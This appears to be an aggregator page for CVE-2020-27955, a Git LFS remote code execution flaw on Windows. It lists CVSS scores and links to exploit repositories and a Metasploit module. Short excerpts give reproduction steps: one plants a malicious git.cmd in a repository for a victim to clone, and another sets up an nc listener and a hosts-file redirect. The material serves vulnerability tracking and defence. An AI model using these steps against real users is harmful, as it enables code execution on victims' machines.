CVE-2020-27955

Published: 05/11/2020 Updated: 16/12/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 896
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Git LFS 2.12.0 allows Remote Code Execution.

Vulnerable Product

git large file storage project git large file storage 2.12.0

Exploits

Proof of concept git-lfs remote code execution exploit written in Go. Affects Git, GitHub CLI, GitHub Desktop, Visual Studio, GitKraken, SmartGit, SourceTree, and more ...
This Metasploit module exploits a critical vulnerability in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, which allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker’s malicious repository using a vulnerable Git version control tool ...

Mailing Lists

Full Disclosure mailing list archives: Git LFS (git-lfs) - Remote Code Execution (RCE) exploit CVE-2020-27955 - Clone to Pwn ...

Github Repositories

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (bat / powershell version). Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc. Discovered by Dawid Golunski legalhackerscom exploitboxio. Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKra

cve-2020-27955

CVE-2020-27955 Git-LFS Remote Code Execution Vulnerability. Git LFS is a Git extension developed by Github to implement Git's support for large files. Remote code execution issue found on Git-LFS versions <= 212 on Windows platforms. Git LFS vulnerability allows attackers to compromise targets’ Windows systems. It allows attackers to achieve remote code execu

Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (Go version). Vulnerable: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc. Discovered by Dawid Golunski legalhackerscom exploitboxio. Tested on Windows on: git, GitHub CLI (gh), GitHub Desktop, Visual Studio Code, SourceTree, SmartGit, GitKraken etc. Basica

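Aggregates PoCs and exploits already available on GitHub; CVE information comes from the official CVE website. Auto Collect Poc Or Exp from Github by CVE ID.

PocOrExp in Github. Aggregates PoCs and exploits already available on GitHub; CVE information comes from the official CVE website. Note: aggregation is by generic CVE ID only, so for Windows-numbered vulnerabilities such as MS17-010 and well-known vulnerabilities with nicknames, it is better to search for them yourself. Usage: python3 exppy -h usage: exppy [-h] [-y {1999,2000,2001,2002,2003,2004,2005,2006,2007,20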

githax exploitboxio/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955html

CVE-2020-27955 Thanks mediumcom/bugbountywriteup/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3

cve-2020-27955

cve-2020-27955 cve-2020-27955 Reproduction. Create a GitHub repository: git clone githubcom/attacker/pocgit echo calcexe > gitcmd git lfs track “*dat” echo “Junk” > largedat git add -A git commit -m “POC” git push -u origin master -f

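CVE-2020-27955 vulnerability reproduction. 1. On the Windows machine, download a vulnerable version of Git-LFS. Download address: githubcom/git-for-windows/git/releases/tag/v2292windows1 2. Install it on the Windows machine and add the following entry to the hosts file; 10115 is the host where nc listens on 8888 (replace as needed): 10115 abcallxyz 3. On host 10115, start an nc listener on port 8888: ┌──(root㉿hostname)-[~] └─# nc Cmd line: -l -p 88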

Git-lfs RCE exploit CVE-2020-27955 - tested on Windows on: git, gh cli, GitHub Desktop, Visual Studio, SourceTree etc.
